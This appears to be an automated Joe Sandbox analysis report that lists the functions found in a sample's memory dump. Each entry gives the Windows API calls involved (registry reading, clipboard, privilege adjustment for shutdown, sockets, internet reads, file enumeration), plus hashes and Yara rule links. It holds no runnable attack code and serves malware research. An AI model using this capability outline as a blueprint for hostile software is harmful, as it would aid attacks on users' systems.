                                                                  • _wcslen.LIBCMT ref: 006947B2
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 006947E2
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00694803
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00694813
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0069489A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006948A5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006948B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 1149970189-3457252023
                                                                  • Opcode ID: e36bb55bda7ac7b254786c9edbf28ca3e53a55c1901bccc5e373e075f6b78618
                                                                  • Instruction ID: 8fd2a3618e81223748278615093187fd14f5619fc9f924b23987120d4e7f2b4a
                                                                  • Opcode Fuzzy Hash: e36bb55bda7ac7b254786c9edbf28ca3e53a55c1901bccc5e373e075f6b78618
                                                                  • Instruction Fuzzy Hash: 993193B150414AABDF209BA0DC45FEB37BEEF89704F1041B6F619D6161EB7096858B24
                                                                  Function 0069A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0069A203
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0069A25E
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A269
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0069A285
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0069A2D5
                                                                  • SetCurrentDirectoryW.KERNEL32(006E7B94), ref: 0069A2F3
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069A2FD
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A30A
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A31A
                                                                    • Part of subcall function 0068E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0068E3B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 2640511053-438819550
                                                                  • Opcode ID: 07b82849b9a989cb93c13bc616b3f9b11a5e61cceabbd97a02445724541294e9
                                                                  • Instruction ID: aefd0f7892b6046c19d5a4cb827da4802101f26eccf664da7729c5749153f364
                                                                  • Opcode Fuzzy Hash: 07b82849b9a989cb93c13bc616b3f9b11a5e61cceabbd97a02445724541294e9
                                                                  • Instruction Fuzzy Hash: 793112715002596BCF14AFE4EC09AEE77EF9F45324F1401A5E810E7290EB31DF858AA5
                                                                  Function 006AC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC99E
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 006ACA09
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006ACA2D
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006ACA8C
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006ACB47
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006ACBB4
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006ACC49
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 006ACC9A
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006ACD43
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006ACDE2
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006ACDEF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 3102970594-0
                                                                  • Opcode ID: 2b6ddaec427828df73c8b4f69784bc20e92e163edf59012939096ecd94bd361c
                                                                  • Instruction ID: 007ce68473e3d749bd55a9cfc4ece862d5eb0416adb49c932c088bfb05a8c36e
                                                                  • Opcode Fuzzy Hash: 2b6ddaec427828df73c8b4f69784bc20e92e163edf59012939096ecd94bd361c
                                                                  • Instruction Fuzzy Hash: 4A024D716046109FC714EF24C891E6ABBE6EF49314F1884ADF84ACB2A2D731EC42CF51
                                                                  Function 0068D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                    • Part of subcall function 0068EAB0: GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0068D9CD
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0068DA88
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0068DA9B
                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0068DAB8
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0068DAE2
                                                                    • Part of subcall function 0068DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0068DAC7,?,?), ref: 0068DB5D
                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 0068DAFE
                                                                  • FindClose.KERNEL32(00000000), ref: 0068DB0F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 1946585618-1173974218
                                                                  • Opcode ID: dbf02b47f7782977b39d2b1df8304e051cc2774c2b838e59bd80e3dd01c7b12d
                                                                  • Instruction ID: c9da7c015e3b5599c1fc00465c40aef68fd90c8875d7be3c832612ee76a0c60b
                                                                  • Opcode Fuzzy Hash: dbf02b47f7782977b39d2b1df8304e051cc2774c2b838e59bd80e3dd01c7b12d
                                                                  • Instruction Fuzzy Hash: CA616C7180155DAECF45FBA0DA929EDB7B6AF14300F2042A9E402B7291EB716F09CF64
                                                                  Function 0069F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 55ce5cec3fa3aa860ce40c002d03162ca7872b107ff6f93dc9af185546cf1582
                                                                  • Instruction ID: 1f531407869a55fe7c6071664d5e4add0e294111fd459a7c59d4fb9c010d0751
                                                                  • Opcode Fuzzy Hash: 55ce5cec3fa3aa860ce40c002d03162ca7872b107ff6f93dc9af185546cf1582
                                                                  • Instruction Fuzzy Hash: F641BC71604611AFDB50CF14E888B55BBEAEF04318F15C1A8E819CFB62DB35ED82CB90
                                                                  Function 0068F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00682010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0068205A
                                                                    • Part of subcall function 00682010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00682087
                                                                    • Part of subcall function 00682010: GetLastError.KERNEL32 ref: 00682097
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 0068F249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $ $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-3163812486
                                                                  • Opcode ID: f67cc99966e87be33b892fa467fec6f5fb090248f573824d29ec0d25083bb729
                                                                  • Instruction ID: 091c4246937aa469765bc2efc643360880be69fd84ca6bb5cf2a439aaa747217
                                                                  • Opcode Fuzzy Hash: f67cc99966e87be33b892fa467fec6f5fb090248f573824d29ec0d25083bb729
                                                                  • Instruction Fuzzy Hash: 1E01DB7A6502106BEB5477F89C95BFA726E9B08344F150735FD02E62D1D6605E419360
                                                                  Function 006222AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefDlgProcW.USER32(?,?), ref: 0062233E
                                                                  • GetSysColor.USER32(0000000F), ref: 00622421
                                                                  • SetBkColor.GDI32(?,00000000), ref: 00622434
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Proc
                                                                  • String ID: (o
                                                                  • API String ID: 929743424-1684096767
                                                                  • Opcode ID: 94eaa2db02fad52f2cc0b932d7df3d4a1d3b6db9e0321ec7e49df9d38ec52e1c
                                                                  • Instruction ID: 057563e8f393be9d002e7069b7fcb4735725cb9e6fedbae314c90fa8b83fcb57
                                                                  • Opcode Fuzzy Hash: 94eaa2db02fad52f2cc0b932d7df3d4a1d3b6db9e0321ec7e49df9d38ec52e1c
                                                                  • Instruction Fuzzy Hash: C781C9F0104835BDE229AA39ACA9EFF2A5FEB42300F15011DF102D6795C9599F43DA7A
                                                                  Function 00693A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006656C2,?,?,00000000,00000000), ref: 00693A1E
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006656C2,?,?,00000000,00000000), ref: 00693A35
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,006656C2,?,?,00000000,00000000,?,?,?,?,?,?,006266CE), ref: 00693A45
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,006656C2,?,?,00000000,00000000,?,?,?,?,?,?,006266CE), ref: 00693A56
                                                                  • LockResource.KERNEL32(006656C2,?,?,006656C2,?,?,00000000,00000000,?,?,?,?,?,?,006266CE,?), ref: 00693A65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: aabb42346bb1dd00a4b941cb660da7e72649039407c558146f5105a93ae2a979
                                                                  • Instruction ID: 275109d49407235aec60b340821df72a8d8ee3c6c08bd80c3a34bf1b72b57d63
                                                                  • Opcode Fuzzy Hash: aabb42346bb1dd00a4b941cb660da7e72649039407c558146f5105a93ae2a979
                                                                  • Instruction Fuzzy Hash: 50118EB0200741BFDB218F25DC48F677BBEEBC5B51F14426CB502DA650EB71DD008620
                                                                  Function 006820AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00681900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00681916
                                                                    • Part of subcall function 00681900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00681922
                                                                    • Part of subcall function 00681900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00681931
                                                                    • Part of subcall function 00681900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00681938
                                                                    • Part of subcall function 00681900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0068194E
                                                                  • GetLengthSid.ADVAPI32(?,00000000,00681C81), ref: 006820FB
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00682107
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0068210E
                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00682127
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00681C81), ref: 0068213B
                                                                  • HeapFree.KERNEL32(00000000), ref: 00682142
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                  • String ID:
                                                                  • API String ID: 3008561057-0
                                                                  • Opcode ID: f70b5552cafcef2ebec3c3a8b1bd6fa15305d812bfdda462359e52c3fa75efd7
                                                                  • Instruction ID: 9bc1688c8de88cd0c5414ba14c1fab2c7b5d06c0cd98e5edc58f345eeea988df
                                                                  • Opcode Fuzzy Hash: f70b5552cafcef2ebec3c3a8b1bd6fa15305d812bfdda462359e52c3fa75efd7
                                                                  • Instruction Fuzzy Hash: FE11ACB1500206FFDB14AF64CC1DBAE7BBBFF45355F244218EA81AB220D7359981CB60
                                                                  Function 0069A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0069A5BD
                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0069A6D0
                                                                    • Part of subcall function 006942B9: GetInputState.USER32 ref: 00694310
                                                                    • Part of subcall function 006942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006943AB
                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0069A5ED
                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0069A6BA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                  • String ID: *.*
                                                                  • API String ID: 1972594611-438819550
                                                                  • Opcode ID: 647bb936f832217dfccb9de637da1681654907f83afe46d132495e558e252f61
                                                                  • Instruction ID: 3c818952436c0f78d2efa0e4149763bbd1fb3ca896d9df6c09f9c6626722ee9b
                                                                  • Opcode Fuzzy Hash: 647bb936f832217dfccb9de637da1681654907f83afe46d132495e558e252f61
                                                                  • Instruction Fuzzy Hash: 9341747190020A9FDF55DFA4D845AEE7BFAEF05310F144159F505A6291EB309E84CFA1
                                                                  Function 006A2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006A3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006A3AD7
                                                                    • Part of subcall function 006A3AAB: _wcslen.LIBCMT ref: 006A3AF8
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006A22BA
                                                                  • WSAGetLastError.WSOCK32 ref: 006A22E1
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 006A2338
                                                                  • WSAGetLastError.WSOCK32 ref: 006A2343
                                                                  • closesocket.WSOCK32(00000000), ref: 006A2372
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 1601658205-0
                                                                  • Opcode ID: ab911b11bd44bc9fd7b6a1b61f56a05d5e93ceb358570602f983edeb69732155
                                                                  • Instruction ID: a4bc1cda52bf75abfcf27cd28348f01cc027bf75afc59d39c28d0c8cdc5caa94
                                                                  • Opcode Fuzzy Hash: ab911b11bd44bc9fd7b6a1b61f56a05d5e93ceb358570602f983edeb69732155
                                                                  • Instruction Fuzzy Hash: 3B51F371A40210AFEB10AF28D886F6A77E6AB46318F04809CF9455F3C3C775AD428FE5
                                                                  Function 006B26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: e8b6e4c194b29339ded278cd227572513cec1bbd6b188bf094607c0de07d8c72
                                                                  • Instruction ID: fde033f218695681185cae498c7753a804a8e3d961e6ff480285134b2c743199
                                                                  • Opcode Fuzzy Hash: e8b6e4c194b29339ded278cd227572513cec1bbd6b188bf094607c0de07d8c72
                                                                  • Instruction Fuzzy Hash: 3921B1B57002129FD7219F26C864BDA7BE6EF85314F18807CE8498B351DB71EC82CB99
                                                                  Function 0069D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0069D8CE
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0069D92F
                                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 0069D943
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorEventFileInternetLastRead
                                                                  • String ID:
                                                                  • API String ID: 234945975-0
                                                                  • Opcode ID: 5a32eb40dec6beb4bbb88f83f97f663bd4d5169d7265c26fc640c0a989c6a091
                                                                  • Instruction ID: e8266c0fa50e52a9cc6a88358711db1ce80353d6aa6f58f0074397cac597c167
                                                                  • Opcode Fuzzy Hash: 5a32eb40dec6beb4bbb88f83f97f663bd4d5169d7265c26fc640c0a989c6a091
                                                                  • Instruction Fuzzy Hash: E821C1B1500705EFEB30AF65C844BAA77FEEB41314F10443DE64692682E770EA45CB50
                                                                  Function 0068E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,006646AC), ref: 0068E482
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0068E491
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0068E4A2
                                                                  • FindClose.KERNEL32(00000000), ref: 0068E4AE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
